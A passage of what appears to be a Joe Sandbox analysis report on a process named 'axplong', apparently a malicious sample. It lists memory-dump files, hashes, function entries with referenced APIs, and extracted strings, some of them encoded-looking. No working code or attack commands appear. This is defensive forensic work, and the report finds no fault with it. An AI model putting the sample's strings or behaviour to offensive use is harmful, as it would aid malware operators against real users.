Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: f4fdaa4f31605f848c80f5ccddad46c2f80b6275102ac446582d8f1bc785fa26
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: B651BD70A0C68A9BDF3C8A3888957BE679ADF51340F1C0A7DF482E7682DB11DD499371

Function 00D14CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1fb3a1b4e553e08773468c6d15244c72c61d3d4a2eccc49d2babfd473214535
Instruction ID: aa7ac69a52da40e4ac326e10ab59e5168e60671a204c92882046bca5e957d609
Opcode Fuzzy Hash: b1fb3a1b4e553e08773468c6d15244c72c61d3d4a2eccc49d2babfd473214535
Instruction Fuzzy Hash: 242260B3F516144BDB0CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9159644

Function 00D56F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35d1b8d7bcde6772776d3f6d2e426e7a6a1eb87353d63702194bc606fb53caa
Instruction ID: a74b7bf68ede89135263498a2ccbe8175d068c1c2f0127d6bb5a89f570005609
Opcode Fuzzy Hash: f35d1b8d7bcde6772776d3f6d2e426e7a6a1eb87353d63702194bc606fb53caa
Instruction Fuzzy Hash: 8DB158316146089FDB14CF2CD486A657BF0FF45366F298658EC9ACF2A1C335E986CB50

Function 00D2D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00D1247E

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 7320fcba8c4eb7b1986017ca2218c329435626eb1d8ed9e9d8e206a73c37ed38
Instruction ID: 073584e97d6c3a77accd5f4b20dfff6e3ad332538dec3adf489a8bc5cc805c55
Opcode Fuzzy Hash: 7320fcba8c4eb7b1986017ca2218c329435626eb1d8ed9e9d8e206a73c37ed38
Instruction Fuzzy Hash: 58518EB19007258FEB15CF54E8857ADB7F5FB28314F28856AD448EB294E770A980CF70

Function 00D14AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3364675745debd7b2e135aaca819fc6d7f9dc0541309c045176b369dae07c872
Instruction ID: 57c56e4c44872f453c4adf4c6fc20581f281ecce429ee8343bc4991bab0bd441
Opcode Fuzzy Hash: 3364675745debd7b2e135aaca819fc6d7f9dc0541309c045176b369dae07c872
Instruction Fuzzy Hash: B051B07060C3918FC319CF2D951523ABBF1AF95301F084A9EE0DA87292DB74DA44CBA2

Function 00D5777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f619d87ce11db77122f504fe3a5a4f4d02048eb4ec6092e6a91d28a2bfc648fe
Instruction ID: 0a6f13df586f8b9531deebcde22871bbce059216330e8b6b6c42a336de5c4624
Opcode Fuzzy Hash: f619d87ce11db77122f504fe3a5a4f4d02048eb4ec6092e6a91d28a2bfc648fe
Instruction Fuzzy Hash: E421B673F205394B7B0CC47E8C5727DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 00D5765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da477c491b32e069c556cc897cbb936f2d8142164ba178c25eee3db14103663
Instruction ID: ccde52b87bad042d046b3c66e4ee8177d7dd2ffb6f044c34d24bec10488de993
Opcode Fuzzy Hash: 1da477c491b32e069c556cc897cbb936f2d8142164ba178c25eee3db14103663
Instruction Fuzzy Hash: ED117723F30C255A675C816D8C1727AA5D6DBD825071F533ADC26E7384E994DE23D2A0

Function 00D58720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: fd628e7281573669cd9b07d2500e30b90411a4587e0248e28bb3c0ab959205ea
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A7110B7720014147EE04862DC9F45B6A795EADD323B3C4375DC52AB758ED22D94DFA20

Function 04F30DEA Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2786865143.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f30000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b1bafa2cea973871167a531ef5901b224fbda19360b88a5a9f8c40b96c6ec6
Instruction ID: b33f7fa90b2506b45819be3ad09456f573050ebb4783bb58a4a354e2a44971a3
Opcode Fuzzy Hash: 73b1bafa2cea973871167a531ef5901b224fbda19360b88a5a9f8c40b96c6ec6
Instruction Fuzzy Hash: 24F0E5EB3481513EB101A0517F68AF7776EE2C2332330857BF442C8805EAD91E8B6031

Function 00D4645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06515ef656d914af42bc8b510207b71a9ed38900a80796b95b70fa641c5d32f0
Instruction ID: 69403c7d1b270ae2a06108420bc3771eaa62294b9262089d8e10a72aa022fb0f
Opcode Fuzzy Hash: 06515ef656d914af42bc8b510207b71a9ed38900a80796b95b70fa641c5d32f0
Instruction Fuzzy Hash: 64E0C230140608AFCF267F24DC08D583B1AEF42348F045C10F8094A223CB75ED82C9B1

Function 00D4A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 2264d4c88a20cd895411348d69057135fc4fae405116e94c37dac0775ea6bb8c
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: B3E0B672955228EBCB15DB9D8944D8AF2ACEB49B50F554496B501D3251C270DF00C7E1

Function 00D22E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

WGt=, xrefs: 00D233BA
HBhr, xrefs: 00D2378F
Fz==, xrefs: 00D2369E
invalid stoi argument, xrefs: 00D2425A
8KG0fymoFx==, xrefs: 00D22EC7
stoi argument out of range, xrefs: 00D24269
246122658369, xrefs: 00D233D4

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: b763b480ee1d350559226ddf8f929d04afef319283d3925a234ff750ad0d54d5
Instruction ID: 39a139ba61a666d5f200eeeddb0ba9fe0a2ccae506a88a27a9b9c6c988e3662e
Opcode Fuzzy Hash: b763b480ee1d350559226ddf8f929d04afef319283d3925a234ff750ad0d54d5
Instruction Fuzzy Hash: 61021470D00258EFEF24EFA8D845BDEBBB5EF15308F504158E805A7282D7799A84CBB1

Function 00D470C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00D4710B

Strings

.com, xrefs: 00D4714B
.bat, xrefs: 00D4713A
.exe, xrefs: 00D47118
.cmd, xrefs: 00D47129

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 115dfcf772d6a17488c916b8e8ba6f225ba177a2bcb34fb5e0c8ffd4817c9763
Instruction ID: bafdc0a4f911853b8eac42884e4cc69ff59e5ecd4084e0a940aa2799be40a54d
Opcode Fuzzy Hash: 115dfcf772d6a17488c916b8e8ba6f225ba177a2bcb34fb5e0c8ffd4817c9763
Instruction Fuzzy Hash: E301F937B08716276618641D9C0263B1798DB92BB472D002BFD48F73C2EF45DC0641B0

Function 00D12E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00D12F1F
__Mtx_unlock.LIBCPMT ref: 00D12F8C
__Cnd_broadcast.LIBCPMT ref: 00D12FA3
__Mtx_unlock.LIBCPMT ref: 00D130B5
__Mtx_unlock.LIBCPMT ref: 00D1315B

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 70bde6c4f4e820a6436cff795f6c8e8a36d478c4d0157261767243403a382f7c
Instruction ID: f33c29fc5e19a31418a1e3b63a1bcdcd162204ce9b9963388746c6349cd141aa
Opcode Fuzzy Hash: 70bde6c4f4e820a6436cff795f6c8e8a36d478c4d0157261767243403a382f7c
Instruction Fuzzy Hash: 81A1F3B0A00315AFDB11DF65E8457AAB7F8FF15314F084129E815D7281EB31EA94CBB1

Function 00D4C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D4CA37

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: de6250ac8536da2ab1f3a9f089e2c54f3ad833dc1f7aff8902a432c2a80ca95a
